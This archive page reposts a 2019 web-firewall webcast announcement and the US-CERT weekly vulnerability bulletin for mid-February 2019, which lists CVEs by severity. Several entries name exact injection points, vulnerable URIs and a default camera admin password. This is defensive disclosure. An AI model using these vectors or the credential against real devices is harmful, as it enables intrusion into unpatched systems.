Category Archives: Security

Ask The Expert Webcast: Modern AppSec Tools for Modern AppSec Problems: A Practical Introduction to the Next-Gen WAF – February 19, 2019 1:00pm US/Eastern

This post was originally published on this site

Speakers: Kelly Brazil

Application security is undergoing a broad transformation. From the way applications are architected, developed and deployed to the ever-evolving diversity and scale of the threats they face. Driving this transformation is the growing complexity of application portfolios, which are providing more engaging experiences for customers but are also housing increasingly more data. Simply put, legacy, rules-based web application firewalls (WAFs) like F5 and Imperva Incapsula are not equipped to keep pace with todays dynamic application and threat environments. Security teams need the right tools and strategies built for these new realities. Enter, the next-gen WAF.

But whats so different about a next-gen WAF? Is it merely a buzzword? In this webcast, we will take a practical look at the next-gen WAF by showing how it differs from traditional WAFs and how it tackles some of the trickiest problems in AppSec today, including:

  • How to deliver highly accurate, real-time app protection without burdensome signatures or tuning
  • Incorporating attacker-centric techniques that match today’s threat landscape, including active interrogation and deception
  • Stopping bots and malicious automation
  • How to quickly and effectively extend security to APIs and microservice architectures
  • Building security that automatically mirrors the speed and scale of DevOps without losing control
  • Defending against website defacement attacks

Join us for this 45-minute session to see how modern AppSec tools can tackle modern AppSec problems.

SB19-049: Vulnerability Summary for the Week of February 11, 2019

This post was originally published on this site

Original release date: February 18, 2019 | Last revised: February 19, 2019

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High – Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 – 10.0

  • Medium – Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 – 6.9

  • Low – Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 – 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

 

High Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
abbyy — flexicapture Multiple SQL injection vulnerabilities in the monitoring feature in the HTTP API in ABBYY FlexiCapture before 12 Release 2 allow an attacker to execute arbitrary SQL commands via the mask, sortOrder, filter, or Order parameter. 2019-02-09 7.5 CVE-2018-13792
CONFIRM
aveva — indusoft_web_studio AVEVA Software, LLC InduSoft Web Studio prior to Version 8.1 SP3 and InTouch Edge HMI (formerly InTouch Machine Edition) prior to Version 2017 Update. Code is executed under the program runtime privileges, which could lead to the compromise of the machine. 2019-02-12 10.0 CVE-2019-6543
MISC
EXPLOIT-DB
MISC
aveva — indusoft_web_studio AVEVA Software, LLC InduSoft Web Studio prior to Version 8.1 SP3 and InTouch Edge HMI (formerly InTouch Machine Edition) prior to Version 2017 Update. An unauthenticated remote user could use a specially crafted database connection configuration file to execute an arbitrary process on the server machine. 2019-02-12 10.0 CVE-2019-6545
MISC
EXPLOIT-DB
MISC
cim_project — cim install/install.php in CIM 0.9.3 allows remote attackers to execute arbitrary PHP code via a crafted prefix value because of configuration file mishandling in the N=83 case, as demonstrated by a call to the PHP fputs function that creates a .php file in the public folder. 2019-02-10 7.5 CVE-2019-7692
MISC
dlink — dir-600m_firmware D-Link DIR-600M C1 3.04 devices allow authentication bypass via a direct request to the wan.htm page. 2019-02-11 7.5 CVE-2019-7736
MISC
dlink — dir-878_firmware An issue was discovered on D-Link DIR-878 devices with firmware 1.12A1. This issue is a Command Injection allowing a remote attacker to execute arbitrary code, and get a root shell. A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted /HNAP1 POST request. This occurs when any HNAP API function triggers a call to the twsystem function with untrusted input from the request body for the SetSysLogSettings API function, as demonstrated by shell metacharacters in the IPAddress field. 2019-02-12 9.0 CVE-2019-8312
MISC
dlink — dir-878_firmware An issue was discovered on D-Link DIR-878 devices with firmware 1.12A1. This issue is a Command Injection allowing a remote attacker to execute arbitrary code, and get a root shell. A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted /HNAP1 POST request. This occurs when any HNAP API function triggers a call to the twsystem function with untrusted input from the request body for the SetIPv6FirewallSettings API function, as demonstrated by shell metacharacters in the SrcIPv6AddressRangeStart field. 2019-02-12 9.0 CVE-2019-8313
MISC
dlink — dir-878_firmware An issue was discovered on D-Link DIR-878 devices with firmware 1.12A1. This issue is a Command Injection allowing a remote attacker to execute arbitrary code, and get a root shell. A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted /HNAP1 POST request. This occurs when any HNAP API function triggers a call to the system function with untrusted input from the request body for the SetQoSSettings API function, as demonstrated by shell metacharacters in the IPAddress field. 2019-02-12 9.0 CVE-2019-8314
MISC
dlink — dir-878_firmware An issue was discovered on D-Link DIR-878 devices with firmware 1.12A1. This issue is a Command Injection allowing a remote attacker to execute arbitrary code, and get a root shell. A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted /HNAP1 POST request. This occurs when any HNAP API function triggers a call to the twsystem function with untrusted input from the request body for the SetIPv4FirewallSettings API function, as demonstrated by shell metacharacters in the SrcIPv4AddressRangeStart field. 2019-02-12 9.0 CVE-2019-8315
MISC
dlink — dir-878_firmware An issue was discovered on D-Link DIR-878 devices with firmware 1.12A1. This issue is a Command Injection allowing a remote attacker to execute arbitrary code, and get a root shell. A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted /HNAP1 POST request. This occurs when any HNAP API function triggers a call to the system function with untrusted input from the request body for the SetWebFilterSettings API function, as demonstrated by shell metacharacters in the WebFilterURLs field. 2019-02-12 9.0 CVE-2019-8316
MISC
dlink — dir-878_firmware An issue was discovered on D-Link DIR-878 devices with firmware 1.12A1. This issue is a Command Injection allowing a remote attacker to execute arbitrary code, and get a root shell. A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted /HNAP1 POST request. This occurs when any HNAP API function triggers a call to the twsystem function with untrusted input from the request body for the SetSysEmailSettings API function, as demonstrated by shell metacharacters in the SMTPServerPort field. 2019-02-12 9.0 CVE-2019-8318
MISC
dlink — dir-878_firmware An issue was discovered on D-Link DIR-878 devices with firmware 1.12A1. This issue is a Command Injection allowing a remote attacker to execute arbitrary code, and get a root shell. A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted /HNAP1 POST request. This occurs when any HNAP API function triggers a call to the system function with untrusted input from the request body for the SetStaticRouteIPv4Settings API function, as demonstrated by shell metacharacters in the Gateway field. 2019-02-12 9.0 CVE-2019-8319
MISC
google — android In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, Use-after-free issue in heap while loading audio effects config in audio effects factory. 2019-02-11 7.2 CVE-2018-11962
BID
CONFIRM
google — android In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, Null pointer dereference vulnerability may occur due to missing NULL assignment in NAT module of freed pointer. 2019-02-11 7.2 CVE-2018-12014
BID
CONFIRM
google — android In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, Heap memory was accessed after it was freed 2019-02-11 7.2 CVE-2018-13889
BID
CONFIRM
google — android NVIDIA Tegra OpenMax driver (libnvomx) contains a vulnerability in which the software does not validate or incorrectly validates input that can affect the control flow or data flow of a program, which may lead to denial of service or escalation of privileges. Android ID: A-70857947. 2019-02-13 9.3 CVE-2018-6267
BID
CONFIRM
google — android NVIDIA Tegra library contains a vulnerability in libnvmmlite_video.so, where referencing memory after it has been freed may lead to denial of service or possible escalation of privileges. Android ID: A-80433161. 2019-02-13 9.3 CVE-2018-6268
BID
CONFIRM
google — android NVIDIA Tegra OpenMax driver (libnvomx) contains a vulnerability in which the software delivers extra data with the buffer and does not properly validated the extra data, which may lead to denial of service or escalation of privileges. Android ID: A-80198474. 2019-02-13 9.3 CVE-2018-6271
BID
CONFIRM
google — android In bta_ag_parse_cmer of bta_ag_cmd.cc in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out-of-bounds write due to a missing bounds check. This could lead to remote code execution in the bluetooth server with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-112860487. 2019-02-11 10.0 CVE-2018-9583
BID
CONFIRM
joomla — joomla! An issue was discovered in Joomla! before 3.9.3. The phar:// stream wrapper can be used for objection injection attacks because there is no protection mechanism (such as the TYPO3 PHAR stream wrapper) to prevent use of the phar:// handler for non .phar-files. 2019-02-12 7.5 CVE-2019-7743
BID
MISC
mobotix — s14_firmware An issue was discovered on MOBOTIX S14 MX-V4.2.1.61 devices. There is a default password of meinsm for the admin account. 2019-02-09 10.0 CVE-2009-5154
MISC
MISC
mywebsql — mywebsql MyWebSQL 3.7 has a remote code execution (RCE) vulnerability after an attacker writes shell code into the database, and executes the Backup Database function with a .php filename for the backup’s archive file. 2019-02-11 7.5 CVE-2019-7731
MISC
nibbleblog — nibbleblog Nibbleblog 4.0.5 allows eval injection by placing PHP code in the install.php username parameter and then making a content/private/shadow.php request. 2019-02-10 7.5 CVE-2019-7719
MISC
pocoo — jinja2 An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the “source” parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. 2019-02-15 7.5 CVE-2019-8341
MISC
EXPLOIT-DB
qualcomm — mdm9206_firmware There is potential for memory corruption in the RIL daemon due to de reference of memory outside the allocated array length in RIL in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables in versions MDM9206, MDM9607, MDM9635M, MDM9650, MSM8909W, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 625, SD 636, SD 650/52, SD 675, SD 712 / SD 710 / SD 670, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDM439, SDM630, SDM660, ZZ_QCS605. 2019-02-11 7.2 CVE-2018-13888
BID
CONFIRM
qualcomm — mdm9607_firmware Unauthorized access may be allowed by the SCP11 Crypto Services TA will processing commands from other TA in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile and Snapdragon Voice & Music in versions MDM9607, MDM9650, MDM9655, MSM8996AU, SD 210/SD 212/SD 205, SD 410/12, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 615/16/SD 415, SD 625, SD 632, SD 650/52, SD 820, SD 820A, SD 835, SD 8CX, SDM439, Snapdragon_High_Med_2016. 2019-02-11 7.2 CVE-2018-11888
BID
CONFIRM
taogogo — taocms taocms through 2014-05-24 allows eval injection by placing PHP code in the install.php db_name parameter and then making a config.php request. 2019-02-10 7.5 CVE-2019-7720
MISC
traq — traq Traq 3.7.1 allows SQL Injection via a tickets?search= URI. 2019-02-10 7.5 CVE-2018-20779
MISC
we-con — levistudiou Several heap-based buffer overflow vulnerabilities in WECON LeviStudioU version 1.8.56 and prior have been identified, which may allow arbitrary code execution. Mat Powell, Ziad Badawi, and Natnael Samson working with Trend Micro’s Zero Day Initiative, reported these vulnerabilities to NCCIC. 2019-02-12 9.3 CVE-2019-6539
BID
MISC
webassembly — binaryen An assertion failure was discovered in wasm::WasmBinaryBuilder::getType() in wasm-binary.cpp in Binaryen 1.38.22. This allows remote attackers to cause a denial of service (failed assertion and crash) via a crafted wasm file. 2019-02-09 7.1 CVE-2019-7662
MISC

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
abb — cp400pb_firmware The TextEditor 2.0 in ABB CP400 Panel Builder versions 2.0.7.05 and earlier contain a vulnerability in the file parser of the Text Editor wherein the application doesn’t properly prevent the insertion of specially crafted files which could allow arbitrary code execution. 2019-02-13 6.8 CVE-2018-19008
BID
MISC
apache — jspwiki A carefully crafted URL could trigger an XSS vulnerability on Apache JSPWiki, from versions up to 2.10.5, which could lead to session hijacking. 2019-02-11 4.3 CVE-2018-20242
BID
MLIST
atlassian — confluence Atlassian Confluence Server and Data Center before version 6.13.1 allows an authenticated user to download a deleted page via the word export feature. 2019-02-13 4.0 CVE-2018-20237
BID
CONFIRM
atlassian — crowd Various rest resources in Atlassian Crowd before version 3.2.7 and from version 3.3.0 before version 3.3.4 allow remote attackers to authenticate using an expired user session via an insufficient session expiration vulnerability. 2019-02-13 5.5 CVE-2018-20238
BID
CONFIRM
atto — fibrebridge_7500n_firmware ATTO FibreBridge 7500N firmware version 2.95 is susceptible to a vulnerability which allows attackers to cause a Denial of Service (DoS). 2019-02-12 5.0 CVE-2018-5499
CONFIRM
axiositalia — registro_elettronico Axios Italia Axios RE 1.7.0/7.0.0 devices have XSS via the RELogOff.aspx Error_Parameters parameter. In some situations, the XSS would be on the family.axioscloud.it cloud service; however, the vendor also supports “Sissi in Rete (con server)” for offline operation. 2019-02-10 4.3 CVE-2019-7693
MISC
MISC
axiosys — bento4 An issue was discovered in Bento4 v1.5.1-627. There is an assertion failure in AP4_AtomListWriter::Action in Core/Ap4Atom.cpp, leading to a denial of service (program crash), as demonstrated by mp42hls. 2019-02-10 4.3 CVE-2019-7697
MISC
axiosys — bento4 An issue was discovered in AP4_Array<AP4_CttsTableEntry>::EnsureCapacity in Core/Ap4Array.h in Bento4 1.5.1-627. Crafted MP4 input triggers an attempt at excessive memory allocation, as demonstrated by mp42hls, a related issue to CVE-2018-20095. 2019-02-10 4.3 CVE-2019-7698
MISC
axiosys — bento4 A heap-based buffer over-read occurs in AP4_BitStream::WriteBytes in Codecs/Ap4BitStream.cpp in Bento4 v1.5.1-627. Remote attackers could leverage this vulnerability to cause an exception via crafted mp4 input, which leads to a denial of service. 2019-02-10 4.3 CVE-2019-7699
MISC
beescms — beescms BEESCMS 4.0 has a CSRF vulnerability to add arbitrary VIP accounts via the admin/admin_member.php?action=add&nav=add_web_user&admin_p_nav=user URI. 2019-02-15 6.8 CVE-2019-8347
MISC
dbninja — dbninja DbNinja 3.2.7 allows session fixation via the data.php sessid parameter. 2019-02-11 6.8 CVE-2019-7747
MISC
dbninja — dbninja _includesonline.php in DbNinja 3.2.7 allows XSS via the data.php task parameter if _users/admin/tasks.php exists. 2019-02-11 4.3 CVE-2019-7748
MISC
elfutils_project — elfutils In elfutils 0.175, a negative-sized memcpy is attempted in elf_cvt_note in libelf/note_xlate.h because of an incorrect overflow check. Crafted elf input causes a segmentation fault, leading to denial of service (program crash). 2019-02-09 4.3 CVE-2019-7664
MISC
elfutils_project — elfutils In elfutils 0.175, a heap-based buffer over-read was discovered in the function elf32_xlatetom in elf32_xlatetom.c in libelf. A crafted ELF input can cause a segmentation fault leading to denial of service (program crash) because ebl_core_note does not reject malformed core file notes. 2019-02-09 4.3 CVE-2019-7665
MISC
MISC
enigmail — enigmail Enigmail before 2.0.6 is prone to to OpenPGP signatures being spoofed for arbitrary messages using a PGP/INLINE signature wrapped within a specially crafted multipart HTML email. 2019-02-11 4.3 CVE-2018-15586
MISC
estrongs — es_file_explorer_file_manager The Help feature in the ES File Explorer File Manager application 4.1.9.7.4 for Android allows session hijacking by a Man-in-the-middle attacker on the local network because HTTPS is not used, and an attacker’s web site is displayed in a WebView with no information about the URL. 2019-02-15 4.3 CVE-2019-8345
MISC
f5 — big-ip_access_policy_manager On BIG-IP 14.0.0-14.0.0.2, 13.0.0-13.1.1.3, 12.1.0-12.1.3.7, and 11.6.0-11.6.3.2, a reflected Cross Site Scripting (XSS) vulnerability is present in an undisclosed page of the BIG-IP TMUI (Traffic Management User Interface) also known as the BIG-IP configuration utility. 2019-02-13 4.3 CVE-2019-6589
CONFIRM
frog_cms_project — frog_cms Frog CMS 0.9.5 allows PHP code execution via <?php to the admin/?/layout/edit/1 URI. 2019-02-10 6.5 CVE-2018-20772
MISC
frog_cms_project — frog_cms Frog CMS 0.9.5 allows PHP code execution by visiting admin/?/page/edit/1 and inserting additional <?php lines. 2019-02-10 6.5 CVE-2018-20773
MISC
frog_cms_project — frog_cms admin/?/plugin/file_manager in Frog CMS 0.9.5 allows PHP code execution by creating a new .php file containing PHP code, and then visiting this file under the public/ URI. 2019-02-10 6.5 CVE-2018-20775
MISC
frog_cms_project — frog_cms Frog CMS 0.9.5 provides a directory listing for a /public request. 2019-02-10 5.0 CVE-2018-20776
MISC
frog_cms_project — frog_cms admin/?/plugin/file_manager in Frog CMS 0.9.5 allows XSS by creating a new file containing a crafted attribute of an IMG element. 2019-02-10 4.3 CVE-2018-20778
MISC
gnome — evolution GNOME Evolution through 3.28.2 is prone to OpenPGP signatures being spoofed for arbitrary messages using a specially crafted email that contains a valid signature from the entity to be impersonated as an attachment. 2019-02-11 4.3 CVE-2018-15587
MISC
google — android In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, Absence of length sanity check may lead to possible stack overflow resulting in memory corruption in trustzone region. 2019-02-11 4.6 CVE-2018-12010
CONFIRM
google — android In all android releases(Android for MSM, Firefox OS for MSM, QRD Android) from CAF using the linux kernel, Out of bound mask range access caused by using possible old value of msg mask table count while copying masks to userspace. 2019-02-11 4.6 CVE-2018-13893
CONFIRM
google — android In package installer in Android-8.0, Android-8.1 and Android-9, there is a possible bypass of the unknown source warning due to a confused deputy scenario. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-112031362. 2019-02-11 4.6 CVE-2018-9582
BID
CONFIRM
google — android In nfc_ncif_set_config_status of nfc_ncif.cc in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-114047681. 2019-02-11 4.6 CVE-2018-9584
BID
CONFIRM
google — android In nfc_ncif_proc_get_routing of nfc_ncif.cc in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-117554809. 2019-02-11 4.6 CVE-2018-9585
BID
CONFIRM
google — android In run of InstallPackageTask.java in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, it is possible that package verification is turned off and remains off due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-116754444. 2019-02-11 4.4 CVE-2018-9586
BID
CONFIRM
google — android In savePhotoFromUriToUri of ContactPhotoUtils.java in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is possible unauthorized access to files within the contact app due to a confused deputy scenario. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Android ID: A-113597344. 2019-02-11 4.4 CVE-2018-9587
BID
CONFIRM
google — android In add_attr of sdp_discovery.c in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-115900043. 2019-02-11 5.0 CVE-2018-9590
BID
CONFIRM
google — android In bta_hh_ctrl_dat_act of bta_hh_act.cc in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-116108738. 2019-02-11 5.0 CVE-2018-9591
BID
CONFIRM
google — android In mca_ccb_hdl_rsp of mca_cact.cc in Android-7.0, Android-7.1.1, Android-7.1.2, Android-8.0, Android-8.1 and Android-9, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Android ID: A-116319076. 2019-02-11 5.0 CVE-2018-9592
BID
CONFIRM
hotels_server_project — hotels_server controller/fetchpwd.php and controller/doAction.php in Hotels_Server through 2018-11-05 rely on base64 in an attempt to protect password storage. 2019-02-08 5.0 CVE-2019-7648
MISC
housegate — house_gate Directory traversal vulnerability in HOUSE GATE App for iOS 1.7.8 and earlier allows remote attackers to read arbitrary files via unspecified vectors. 2019-02-13 5.0 CVE-2019-5910
JVN
joomla — joomla! An issue was discovered in Joomla! before 3.9.3. The “No Filtering” textfilter overrides child settings in the Global Configuration. This is intended behavior. However, it might be unexpected for the user because the configuration dialog lacks an additional message to explain this. 2019-02-12 4.3 CVE-2019-7739
BID
MISC
joomla — joomla! An issue was discovered in Joomla! before 3.9.3. Inadequate parameter handling in JavaScript code (core.js writeDynaList) could lead to an XSS attack vector. 2019-02-12 4.3 CVE-2019-7740
MISC
joomla — joomla! An issue was discovered in Joomla! before 3.9.3. Inadequate checks at the Global Configuration helpurl settings allowed stored XSS. 2019-02-12 4.3 CVE-2019-7741
MISC
joomla — joomla! An issue was discovered in Joomla! before 3.9.3. A combination of specific web server configurations, in connection with specific file types and browser-side MIME-type sniffing, causes an XSS attack vector. 2019-02-12 4.3 CVE-2019-7742
MISC
joomla — joomla! An issue was discovered in Joomla! before 3.9.3. Inadequate filtering on URL fields in various core components could lead to an XSS vulnerability. 2019-02-12 4.3 CVE-2019-7744
MISC
lexmark — 6500e_firmware Certain Lexmark CX, MX, X, XC, XM, XS, and 6500e devices before 2019-02-11 allow remote attackers to erase stored shortcuts. 2019-02-11 6.4 CVE-2019-6489
CONFIRM
libtiff — libtiff An Invalid Address dereference was discovered in TIFFWriteDirectoryTagTransferfunction in libtiff/tif_dirwrite.c in LibTIFF 4.0.10, affecting the cpSeparateBufToContigBuf function in tiffcp.c. Remote attackers could leverage this vulnerability to cause a denial-of-service via a crafted tiff file. This is different from CVE-2018-12900. 2019-02-09 4.3 CVE-2019-7663
MISC
MLIST
linux — linux_kernel In the Linux kernel before 4.20.8, kvm_ioctl_create_device in virt/kvm/kvm_main.c mishandles reference counting because of a race condition, leading to a use-after-free. 2019-02-15 5.8 CVE-2019-6974
MISC
MISC
MISC
MISC
MISC
MISC
MISC
EXPLOIT-DB
live555 — streaming_media In Live555 0.95, a setup packet can cause a memory leak leading to DoS because, when there are multiple instances of a single field (username, realm, nonce, uri, or response), only the last instance can ever be freed. 2019-02-11 5.0 CVE-2019-7732
MISC
live555 — streaming_media In Live555 0.95, there is a buffer overflow via a large integer in a Content-Length HTTP header because handleRequestBytes has an unrestricted memmove. 2019-02-11 5.0 CVE-2019-7733
MISC
metinfo — metinfo An issue was discovered in Metinfo 6.x. An attacker can leverage a race condition in the backend database backup function to execute arbitrary PHP code via admin/index.php?n=databack&c=index&a=dogetsql&tables=<?php and admin/databack/bakup_tables.php?2=file_put_contents URIs because app/system/databack/admin/index.class.php creates bakup_tables.php temporarily. 2019-02-10 6.8 CVE-2019-7718
MISC
mobotix — s14_firmware An issue was discovered on MOBOTIX S14 MX-V4.2.1.61 devices. Administrator Credentials are stored in the 13-character DES hash format. 2019-02-09 5.0 CVE-2019-7673
MISC
mobotix — s14_firmware An issue was discovered on MOBOTIX S14 MX-V4.2.1.61 devices. /admin/access accepts a request to set the “aaaaa” password, considered insecure for some use cases, from a user. 2019-02-09 5.0 CVE-2019-7674
MISC
mobotix — s14_firmware An issue was discovered on MOBOTIX S14 MX-V4.2.1.61 devices. The default management application is delivered over cleartext HTTP with Basic Authentication, as demonstrated by the /admin/index.html URI. 2019-02-09 5.0 CVE-2019-7675
MISC
mywebsql — mywebsql MyWebSQL 3.7 has a Cross-site request forgery (CSRF) vulnerability for deleting a database via the /?q=wrkfrm&type=databases URI. 2019-02-11 4.9 CVE-2019-7730
MISC
nasm — netwide_assembler In Netwide Assembler (NASM) 2.14.02, there is a use-after-free in paste_tokens in asm/preproc.c. 2019-02-15 6.8 CVE-2019-8343
MISC
nconsulting — nc-cms lib/NCCms.class.php in nc-cms 3.5 allows upload of .php files via the index.php?action=save name and editordata parameters. 2019-02-10 5.0 CVE-2019-7721
MISC
nttdocomo — v20_pro_l-01j_firmware V20 PRO L-01J software version L01J20c and L01J20d has a NULL pointer exception flaw that can be used by an attacker to cause the device to crash on the same network range via a specially crafted access point. 2019-02-13 5.7 CVE-2019-5914
JVN
MISC
omron — cx-supervisor An access of uninitialized pointer vulnerability in CX-Supervisor (Versions 3.42 and prior) could lead to type confusion when processing project files. An attacker could use a specially crafted project file to exploit and execute code under the privileges of the application. 2019-02-12 6.0 CVE-2018-19018
MISC
qualcomm — mdm9206_firmware While processing radio connection status change events, Radio index is not properly validated in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile and Snapdragon Voice & Music in versions MDM9206, MDM9607, MDM9640, MDM9650, MSM8996AU, SD 210/SD 212/SD 205, SD 425, SD 427, SD 430, SD 435, SD 439 / SD 429, SD 450, SD 625, SD 636, SD 650/52, SD 675, SD 712 / SD 710 / SD 670, SD 820, SD 820A, SD 835, SD 845 / SD 850, SD 855, SDA660, SDM439, SDM630, SDM660, SDX20, SDX24. 2019-02-11 4.6 CVE-2018-11899
CONFIRM
rarlab — winrar In WinRAR versions prior to and including 5.60, There is an out-of-bounds write vulnerability during parsing of a crafted LHA / LZH archive formats. Successful exploitation could lead to arbitrary code execution in the context of the current user. 2019-02-12 6.8 CVE-2018-20253
MISC
schoolcms — schoolcms An issue was discovered in SchoolCMS 2.3.1. There is an XSS vulnerability via index.php?a=Index&c=Channel&m=Home&viewid=[XSS]. 2019-02-13 4.3 CVE-2019-8334
MISC
schoolcms — schoolcms An issue was discovered in SchoolCMS 2.3.1. There is an XSS vulnerability via index.php?a=Index&c=Channel&m=Home&id=[XSS]. 2019-02-13 4.3 CVE-2019-8335
MISC
symantec — ghost_solution_suite Symantec Ghost Solution Suite (GSS) versions prior to 3.3 RU1 may be susceptible to a DLL hijacking vulnerability, which is a type of issue whereby a potential attacker attempts to execute unexpected code on your machine. This occurs via placement of a potentially foreign file (DLL) that the attacker then attempts to run via a linked application. 2019-02-08 6.0 CVE-2018-18364
BID
CONFIRM
traq — traq Traq 3.7.1 allows admin/users/new CSRF to create an admin account (aka group_id=1). 2019-02-10 6.8 CVE-2018-20780
MISC
verydows — verydows A CSRF vulnerability was found in Verydows v2.0 that can add an admin account via index.php?m=backend&c=admin&a=add&step=submit. 2019-02-11 6.8 CVE-2019-7737
MISC
verydows — verydows Verydows 2.0 has XSS via the index.php?m=api&c=stats&a=count referrer parameter. 2019-02-12 4.3 CVE-2019-7753
MISC
we-con — levistudiou A memory corruption vulnerability has been identified in WECON LeviStudioU version 1.8.56 and prior, which may allow arbitrary code execution. Mat Powell, Ziad Badawi, and Natnael Samson working with Trend Micro’s Zero Day Initiative, reported these vulnerabilities to NCCIC. 2019-02-12 6.8 CVE-2019-6541
BID
MISC
webassembly — binaryen A heap-based buffer over-read was discovered in wasm::WasmBinaryBuilder::visitCall in wasm-binary.cpp in Binaryen 1.38.22. A crafted wasm input can cause a segmentation fault, leading to denial-of-service, as demonstrated by wasm-merge. 2019-02-10 4.3 CVE-2019-7700
MISC
webassembly — binaryen A heap-based buffer over-read was discovered in wasm::SExpressionParser::skipWhitespace() in wasm-s-parser.cpp in Binaryen 1.38.22. A crafted wasm input can cause a segmentation fault, leading to denial-of-service, as demonstrated by wasm2js. 2019-02-10 4.3 CVE-2019-7701
MISC
webassembly — binaryen A NULL pointer dereference was discovered in wasm::SExpressionWasmBuilder::parseExpression in wasm-s-parser.cpp in Binaryen 1.38.22. A crafted wasm input can cause a segmentation fault, leading to denial-of-service, as demonstrated by wasm-as. 2019-02-10 4.3 CVE-2019-7702
MISC
webassembly — binaryen In Binaryen 1.38.22, there is a use-after-free problem in wasm::WasmBinaryBuilder::visitCall in wasm-binary.cpp. Remote attackers could leverage this vulnerability to cause a denial-of-service via a wasm file, as demonstrated by wasm-merge. 2019-02-10 4.3 CVE-2019-7703
MISC
webassembly — binaryen wasm::WasmBinaryBuilder::readUserSection in wasm-binary.cpp in Binaryen 1.38.22 triggers an attempt at excessive memory allocation, as demonstrated by wasm-merge and wasm-opt. 2019-02-10 4.3 CVE-2019-7704
MISC

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
atlassian — jira The two-dimensional filter statistics gadget in Atlassian Jira before version 7.6.10, from version 7.7.0 before version 7.12.4, and from version 7.13.0 before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the name of a saved filter when displayed on a Jira dashboard. 2019-02-13 3.5 CVE-2018-13403
CONFIRM
atlassian — jira The labels widget gadget in Atlassian Jira before version 7.6.11 and from version 7.7.0 before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the rendering of retrieved content from a url location that could be manipulated by the up_projectid widget preference setting. 2019-02-13 3.5 CVE-2018-20232
BID
CONFIRM
